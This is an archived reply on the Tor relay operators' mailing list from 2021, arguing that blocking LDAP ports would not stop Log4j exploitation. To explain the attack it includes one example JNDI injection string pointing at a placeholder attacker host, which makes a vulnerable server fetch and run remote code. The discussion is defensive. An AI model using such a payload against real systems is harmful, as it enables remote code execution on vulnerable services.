[Author Prev][Author Next][Thread Prev][Thread Next][Author Index][Thread Index]

Re: [tor-relays] Mitigating log4j exploits

To: tor-relays@xxxxxxxxxxxxxxxxxxxx
Subject: Re: [tor-relays] Mitigating log4j exploits
From: Felix Eckhofer via tor-relays <tor-relays@xxxxxxxxxxxxxxxxxxxx>
Date: Sat, 11 Dec 2021 17:33:55 +0100
Cc: Felix Eckhofer <felix@xxxxxxxxx>
Delivered-to: archiver@xxxxxxxx
Delivery-date: Sat, 11 Dec 2021 12:51:47 -0500
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=tribut.de; s=dkim; t=1639240436; bh=NiE4AxD+p2gRUYZLDRBo313lWYLf60LqgQrLW5eM0lI=; h=Date:From:To:Subject:In-Reply-To:References; b=fpyitKDb839RZNnklbJy13Dk5jIpMQg14LV2xwfdbRlwMirqBLVHZbUQRSvphtcjy rp8Owrf8XwkuSQLE95hlepCTc8tVdRJsZPiPnH4/T2wFVRNCMORQlY0mJLRQg0N3ka ParZms1Vs8qlgDzoPyYLDcPIKGFwOIr6Jv7tzbaM8c9BOMccO2C5zqNBnL+0yZ4Ffi b6n5SYwSDzst1jB2G9G5F3PJybHadAulftzvVfo41U+ILnz5UCBTXQEOXrBDCNRklS 56i+0Y57U/95cVoGRa+1B/Flnepj/HGdZf6Tpzu7hwuyYTLPCdNHLFTLCkS+0U47H2 Sz7simaIk/Opw==
In-reply-to: <8e3686d8-cd24-e9d9-96bd-a6d55c535993@kubieziel.de>
List-archive: <http://lists.torproject.org/pipermail/tor-relays/>
List-help: <mailto:tor-relays-request@lists.torproject.org?subject=help>
List-id: "support and questions about running Tor relays $exit, non-exit, bridge$" <tor-relays.lists.torproject.org>
List-post: <mailto:tor-relays@lists.torproject.org>
List-subscribe: <https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-relays>, <mailto:tor-relays-request@lists.torproject.org?subject=subscribe>
List-unsubscribe: <https://lists.torproject.org/cgi-bin/mailman/options/tor-relays>, <mailto:tor-relays-request@lists.torproject.org?subject=unsubscribe>
References: <8e3686d8-cd24-e9d9-96bd-a6d55c535993@kubieziel.de>
Reply-to: tor-relays@xxxxxxxxxxxxxxxxxxxx
Sender: "tor-relays" <tor-relays-bounces@xxxxxxxxxxxxxxxxxxxx>

Hey,

Am 11.12.2021 13:51, schrieb Jens Kubieziel:

attacks. One possibility is, in my opinion, rejecting connection over
ports 389 and 636. What do you think? Should we as exit node operators
block connections over those LDAP ports for some amount of time?


don't think this is going to help.

The exploit works like this: Send a special string that *references* anldap server (most used right now, though other protocols are possible),such as "${jndi:ldap://attacker.example.com:port/a}";. The target thencontacts the ldap server and essentially downloads the malicious codefrom there. You can include a custom port as shown and many attackersdo. Most exploit attempts use http(s). Nothing we can block withoutpacket inspection.



Best regards,
Felix
_______________________________________________
tor-relays mailing list
tor-relays@xxxxxxxxxxxxxxxxxxxx
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-relays

References:
- [tor-relays] Mitigating log4j exploits
  - From: Jens Kubieziel

Prev by Author: Re: [tor-relays] Responding to Tor censorship in Russia
Next by Author: Re: [tor-relays] Introduction from lokodlare
Previous by thread: [tor-relays] Mitigating log4j exploits
Next by thread: [tor-relays] is my tor bridge running ok ?
Index(es):
- Author
- Thread